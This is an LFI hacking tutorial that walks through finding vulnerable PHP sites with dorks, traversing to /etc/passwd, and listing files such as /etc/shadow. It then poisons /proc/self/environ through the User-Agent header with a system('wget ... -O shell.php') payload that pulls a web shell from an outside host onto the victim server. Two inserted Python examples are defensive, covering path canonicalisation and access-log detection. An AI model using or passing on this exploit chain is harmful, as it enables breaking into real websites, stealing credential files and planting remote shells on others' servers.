Local File Inclusion (LFI) Tutorial

So, first of all: what is LFI? LFI means Local File Inclusion. The application includes a file whose name comes from a request parameter, so through an LFI vulnerability you can read files on the website/server via your browser.
First of all you need an LFI-vulnerable website.
There are many tools to check websites for LFI vulnerabilities. There are also some dorks to find LFI-vulnerable sites.
Just put inurl:.php before the dork, like:

inurl:.view.php?id=

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
contact=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik=
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=

After using these dorks you can find many websites, but not all of them are vulnerable to LFI.

But among them you can find sites which are vulnerable to LFI.

For example, say I found a website:

www.victimsite.com/action.php?page=contact.php 
Now we are going to check whether it is vulnerable or not. To do that we replace contact.php with ../ so the URL becomes:

www.victimsite.com/action.php?page=../


Check the page source and see if you get this error:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/victimsite.com/action.php on line 1337 
If you get this error or something like it, there is a large chance that the website is vulnerable to LFI.
If you get a blank page, the website is not vulnerable to LFI.

Now let's check for etc/passwd to see if it is really Local File Inclusion vulnerable. Let's make a request:

www.victimsite.com/action.php?page=../../../etc/passwd 
We got an error and no etc/passwd file:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 
So we go more directories up to find the etc/passwd file:
www.victimsite.com/action.php?page=../../../../../../etc/passwd 
We successfully included the etc/passwd file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
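To see why the number of ../ segments matters in the two probes above, and what the fix on the server side looks like, here is an added Python example (not code from the tutorial): it resolves both probes against the script directory shown in the warning, then shows the allowlist plus canonical-path check a hardened include should do. PAGES_DIR and ALLOWED_PAGES are assumptions made for the example.

```python
import posixpath

# Directory of the vulnerable script, taken from the warning on this page.
SCRIPT_DIR = "/home/sirgod/public_html/victimsite.com"
# Constructed for this example: where legitimate page fragments live and
# which ones the script may include.
PAGES_DIR = SCRIPT_DIR + "/pages"
ALLOWED_PAGES = {"contact.php", "about.php"}


def resolve_include(script_dir, page):
    """Resolve a relative include() argument the way the filesystem will.

    normpath collapses '..' components and, like the kernel, stops at '/',
    so surplus '../' segments cost nothing (assumes the include is resolved
    against the script's own directory)."""
    return posixpath.normpath(posixpath.join(script_dir, page))


def jail_path(base, page):
    """Canonicalise base/page and refuse anything that escapes base.

    Canonicalising first, instead of stripping '../' out of the string, is
    what makes this hold up against nested or surplus traversal sequences.
    It does not see symlinks; use os.path.realpath on a real filesystem."""
    full = posixpath.normpath(posixpath.join(base, page))
    if not full.startswith(base + "/"):
        return None
    return full


def safe_include_path(page):
    """Hardened replacement for include($_GET['page']): allowlist the page
    names and keep the jail check as defence in depth."""
    if page not in ALLOWED_PAGES:
        return None
    return jail_path(PAGES_DIR, page)


if __name__ == "__main__":
    # The tutorial's two probes: three '../' only reach /home/etc/passwd
    # (hence the "No such file" warning), six reach the real /etc/passwd.
    for probe in ("../../../etc/passwd", "../../../../../../etc/passwd"):
        print(probe, "->", resolve_include(SCRIPT_DIR, probe))
    print(safe_include_path("contact.php"))
    print(safe_include_path("../../../../../../etc/passwd"))
```

With display_errors turned off, the failed include produces a blank page instead of the warning, so on the defending side a blank page alone is no proof that the parameter is safe.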

There are also other useful files that you can read :-)

/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
Checking if proc/self/environ is accessible

Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ:

www.victimsite.com/action.php?page=../../../../../proc/self/environ 
If you get something like this:
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=../../../../../../proc/self/environ
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=../../../../../../proc/self/environ
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80
then proc/self/environ is accessible. If you get a blank page or an error, proc/self/environ is not accessible.

Now, how to inject malicious code?

Now we inject our malicious code through proc/self/environ. How can we do that? The environment you just read contains the request headers, so we can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent (Tamper Data is a Mozilla Firefox add-on; just Google it and you will find it). Start Tamper Data in Firefox and request the URL.

Choose Tamper and in the User-Agent field write the following code:

system('wget http://www.drivehq.com/web/username/your shellname.txt -O shell.php');?>
EXAMPLE:
system('wget http://abcxyz.0adz.com/WSO.txt -O shell.php');?>
If it doesn't work, try exec(), because system() can be disabled on the web server in php.ini.

It is not important to upload your shell to drivehq; you can use your own site or other free web hosting sites.

After you upload your shell with this code you can access it at:
www.victimsite.com/shell.php
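For the defender's side of the traversal probes and the User-Agent injection described above, here is an added Python example (not part of the tutorial) that scans combined-format access-log lines for traversal sequences, the sensitive paths listed on this page, and PHP code in request headers. The log lines and the regex are constructed for the example, and the payload in the last line is elided.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format as written by Apache/nginx (regex is my own).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# Files the tutorial reads through the include; /proc/self/environ is the one
# that turns a file read into code execution.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")
# A PHP tag or a system()/exec() call has no business in a browser header.
PHP_IN_HEADER = re.compile(r"<\?|\?>|\b(?:system|exec)\s*\(", re.IGNORECASE)

# Constructed sample lines: one clean request, the two probes from the
# tutorial (one percent-encoded), then the environ request with a poisoned
# User-Agent.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET /action.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /action.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1987 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET /action.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 3011 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:49 +0000] "GET /action.php?page=../../../../../proc/self/environ HTTP/1.1" 200 3011 "-" "system(\'...\');?>"',
]


def classify(line):
    """Return the findings for one access-log line (empty list = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    findings = []
    for _, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; this catches double encoding
        if "../" in value or "..\\" in value:
            findings.append("traversal:" + value)
        if any(path in value for path in SENSITIVE):
            findings.append("sensitive-file:" + value)
    # Header values land in /proc/self/environ, so PHP in them is the
    # poisoning step, not browser noise.
    for header in ("ua", "referer"):
        if PHP_IN_HEADER.search(m[header]):
            findings.append("php-in-" + header)
    return findings


def scan(lines):
    """Map line index -> findings for every line that is not clean."""
    report = {}
    for i, line in enumerate(lines):
        findings = classify(line)
        if findings:
            report[i] = findings
    return report
```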
THANKS FOR READING....

In part 2 I will teach you how to fix the LFI vulnerability :)


That's all about LFI.
